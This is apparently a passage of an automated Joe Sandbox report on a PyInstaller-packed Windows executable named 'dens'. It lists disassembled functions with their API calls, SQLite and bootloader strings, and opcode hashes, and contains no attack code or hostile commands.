                                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                                              • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                                                                              • API String ID: 973152223-2471937615
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFAB7CFB0: memset.VCRUNTIME140 ref: 00007FFDFAB7D013
                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,00000000,00007FFDFAB7E8DE), ref: 00007FFDFAB80652
                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000000,00007FFDFAB7E8DE), ref: 00007FFDFAB80671
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$AttributesDeletememset
                                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID: %s-shm$readonly_shm$winOpenShm
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
Similarity
• API ID: _msizerealloc
• String ID: failed memory resize %u to %u bytes
• API String ID: 2713192863-2134078882
Memory Dump Source
• Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
APIs
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C105839), ref: 00007FF62C105957
• SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C105839), ref: 00007FF62C10596D
Memory Dump Source
• Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: Time$System$FileLocalSpecific
• String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
APIs
• memset.VCRUNTIME140(?,?,?,00000000,?,00007FFDFAB8EDBF,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFAB8BBF5
• memset.VCRUNTIME140(?,?,?,00000000,?,00007FFDFAB8EDBF,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFAB8BC25
Memory Dump Source
• Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
Similarity
• API ID: memset
• String ID:
APIs
• CloseHandle.KERNEL32(?,?,?,00007FF62C10A9D5,?,?,00000000,00007FF62C10AA8A), ref: 00007FF62C10ABC6
• GetLastError.KERNEL32(?,?,?,00007FF62C10A9D5,?,?,00000000,00007FF62C10AA8A), ref: 00007FF62C10ABD0
Memory Dump Source
• Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
APIs
Memory Dump Source
• Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
APIs
Memory Dump Source
• Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
                                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                                              • Opcode ID: 0748e9379ee1a24a6dd361f3a2547f707c71d81643cc4b02aa9d5a9a64da41ab
                                                                                                                                                                                                                                              • Instruction ID: d56928fdee3c987d9d3b57c350c916d8eab6ef25b33b240f49331e8f89baf7e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0748e9379ee1a24a6dd361f3a2547f707c71d81643cc4b02aa9d5a9a64da41ab
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3021E721B186514AFE909B226C053FA9741BF46BE4FD84430EE0C87786CF7EE091C30A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                              • Instruction ID: 9cb15247dac7a13f397976ee6d40729d6faafa5835ea6b1d42d4fbaf85120410
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC318162A18A4285FF11AB558C4B37C2A90BF80BB4F424135EE5D873D2EFBCE4618713
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                                              • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                              • Instruction ID: f8195fba7d6a3d9f75d43c199d8ef3414ad42b3c16e21b38851ddd6e122addb8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE21A172E05B4589EF249FA4C89A2EC33A0FB14728F444636DB5C86AD9DF38D554C741
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                              • Instruction ID: bdbe6ada64360f091855be2812b099e18cc36867a8fad5b402d1b8833956a7bf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F119031A1C64282EE60AF119C0A27DA364BF85BA4F444431FF8CD7A96CF3DE4219706
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                              • Instruction ID: 9ef281fe64b46a4ebce0232347a78a9b5675b95fd3416e6abbc1af1c79661d40
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A21B032A18A8186EF618F1CD84637976A0FB94BA4F144234EA5DC76D9DF7DD8118B01
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                              • Instruction ID: ed141f50c82a8031c967e7c792f1b6cc904d3698c3d3e6579489e03002e93b41
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B01C421B08B4580EE04DF529D0A0A9A791BF95FF0F488631EE5CD3BD6DE3CD4218345
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62C0F45F4,00000000,00007FF62C0F1985), ref: 00007FF62C0F93C9
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00007FF62C0F6476,?,00007FF62C0F336E), ref: 00007FF62C0F8EA2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2592636585-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,?,?,?,00000000,00007FFDFAB8B95E,?,?,?,?,00000000,00007FFDFAB8B9DE,?,?,00000000,00007FFDFAB89F93), ref: 00007FFDFAB8CA9E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF62C100C90,?,?,?,00007FF62C1022FA,?,?,?,?,?,00007FF62C103AE9), ref: 00007FF62C10D63A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                                              • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                              • Instruction ID: a39ba22ef69299ae5797ac6fb7022814a1b6883c9326e92b67ad90b9cd67a3ad
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AF08C10F1824380FE653B715C5B2B412904FD4BB0F480730EC2EC62C2EE2EA4A28612
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                              • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                              • Instruction ID: d7252acce92481b4eccf3537b187236782f2d67d36c8bbdcf4d5647aad6e1b89
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6D18172A08A8286EF108F38EC592AD3760FF95B68F504235DE5E83AA4DF7CD154C746
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcmpmemcpy
                                                                                                                                                                                                                                              • String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                                              • API String ID: 1784268899-1067337024
                                                                                                                                                                                                                                              • Opcode ID: 14ba734cd6d25d3ab9e29de301cc1b2d38027898f96f5f7fc5655e0f27bc498b
                                                                                                                                                                                                                                              • Instruction ID: bde09798c3cc0be29f551beb871458eb1baf9594450376ab396bfc7802353c62
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14ba734cd6d25d3ab9e29de301cc1b2d38027898f96f5f7fc5655e0f27bc498b
